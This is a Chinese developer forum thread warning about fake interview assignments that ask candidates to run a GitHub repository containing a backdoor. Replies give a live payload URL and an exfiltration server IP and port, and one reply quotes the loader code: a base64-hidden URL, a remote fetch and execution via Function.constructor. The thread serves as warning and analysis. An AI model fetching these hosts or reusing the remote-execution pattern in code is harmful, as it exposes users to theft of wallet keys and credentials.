hr 和我同步了。让我不要参加。
基本套路就是首轮就让下载代码,在本地修改然后运行。 骗子给我的代码: https://github.com/optuconsulting-JS/Real-Estate-Platform
 |
1
qq007523 3 天前
我也遇到了,题目很简单,就是让你把项目运行起来。。。。
|
 |
2
justtokankan 3 天前
是不是 web3 才会多一点,水深?
|
 |
3
jaff 3 天前
然后呢 怎么骗?
HR 让我不要参加? |
 |
4
superkkk 3 天前
|
 |
6
lucays 3 天前  1
hr 让我不要参加。
是什么意思。。哪个公司的 hr |
 |
7
workbest 3 天前 2
|
 |
8
yagamil 3 天前
为啥不曝光企业,或者招聘帖子。
|
 |
9
yandif 3 天前
Mantine UI 都 v9 alpha 版了,它这用的还是 v6 ,不知道骗多久了
|
|
10
superkkk 3 天前 5
病毒下载地址 https://jsonkeeper.com/b/ARL7M
远端服务器 144.172.108.57 偷虚拟币钱包密钥和浏览器历史记录会上传到 144.172.108.57:4899/upload 还会扫盘,读取 win 、mac 的粘贴板 |
 |
11
yusf 3 天前
好家伙,现在世道已经这样了吗?这没点技术还真容易中招
|
 |
12
lvlajzhao1983 OP @yusf 是的。上周 3 个。这周刚开始 2 个。中午的那个,我一看要下载代码,直接拒接了。过了一会约的晚上的那个负责招聘的 hr 告诉我,别参加了,有问题。
惊喜,这周开门红 |
 |
13
enjoeq 3 天前 1
|
 |
15
EJW 3 天前
卧槽学到了,还有这种东西
 |
 |
16
shylockhg 3 天前
我只遇到过相亲骗子,浪费我几天时间
|
 |
17
tina2998 3 天前
原来 github 上的代码不能随便拉的,那怎么辨别有没有后门呢?
|
 |
19
lete 3 天前
你居然上传了 node_modules
 |
 |
20
wxsx666 2 天前
这个仓库我看了,结论很明确:
不是“普通有漏洞”,而是非常像故意塞了后门的恶意仓库,别跑。 核心证据在 server/controllers/userCntrl.js: • 它会读取 .env 里的 DEV_API_KEY • 这个值其实不是正常 API key ,而是一个 base64 编码后的 URL: aHR0cHM6Ly9qc29ua2VlcGVyLmNvbS9iL1JSQ0tH 解码后是: https://jsonkeeper.com/b/RRCKG • 代码会去请求这个远程地址拿一段内容: SessionContent = (await axios.get(src,{headers:{[x_secret_key]:_sign}})).data.cookie • 然后最危险的地方来了,它直接动态执行远程返回的代码: handler = new (Function.constructor)('require', SessionContent); handler(require); 这基本等于: “启动服务时,从外网拉一段隐藏 JS ,再在你机器上直接执行”。 这不是正常业务代码写法,属于典型高危后门/投毒模式。 再结合这些点,风险更高: • .env 被直接提交进仓库,本身就很反常 • 远程载荷地址做了 base64 隐藏 • 用 Function.constructor 执行字符串代码,明显是规避审查的套路 • 仓库里还带了大量不该提交的依赖文件,整体很像“面试投递样本 + 恶意投毒” 所以我的判断: 1. 这仓库高度可疑 2. 很像伪装成面试作业/项目的投毒代码 3. 如果有人本地运行过,应该按“可能已中招”处理 建议马上做的事: • 不要再运行这个仓库 • 如果已经执行过 npm install / npm start / node index.js: • 立刻断网/隔离测试机 • 检查 shell 历史、SSH key 、浏览器 Cookie 、密码管理器、开发环境 token • 轮换 GitHub / GitLab / npm / 云平台 / 邮箱密码和 token • 最好放到纯沙箱或虚拟机里做后续取证,不要在主力机复现 如果你要,我下一步可以继续帮你做两件事里的一个: • 继续深挖:把这个仓库的恶意链路、触发条件、影响面再拆细 • 给你整理一版“面试钓鱼代码识别清单”,以后看到类似仓库一眼就能筛掉 |
 |
23
Xalen 2 天前
 是技术门槛低了 还是搞技术没前途了? 技术型诈骗越来越多了 |
 |
24
UnluckyNinja 2 天前
坛内已经有前车之鉴了()
让你下载现成源码的(本帖套路): https://v2ex.com/t/1147684 让你下载专用沟通软件的(实则远程控制): https://v2ex.com/t/1165881 https://www.v2ex.com/t/1161161 |
 |
25
shengq 2 天前
说到这想起来前段时间找远程,没有我的岗位。他们让我当兼职 HR ,然后负责给他们推人,刚开始推了两个人,其中一个人告诉我面试需要下载代码到本地并运行,我感觉有诡异就跟面试者提了下。第二个老哥告诉我代码里面有后门。然后我就去找他们那边的人说了这个事,还给他们说的公司发了邮箱确认,他们公司一直没给我回信。
最后那个老外跟我摊牌了,他告诉我代码里确实有后门会读取面试者电脑的信息来盗取 usdt 钱包的密钥,还跟我说他愿意给我更多提成。我没同意。 找远程一定要注意,骗子贼多,电脑上也不要放密钥。还有下载代码的一律拒绝 |
Select Language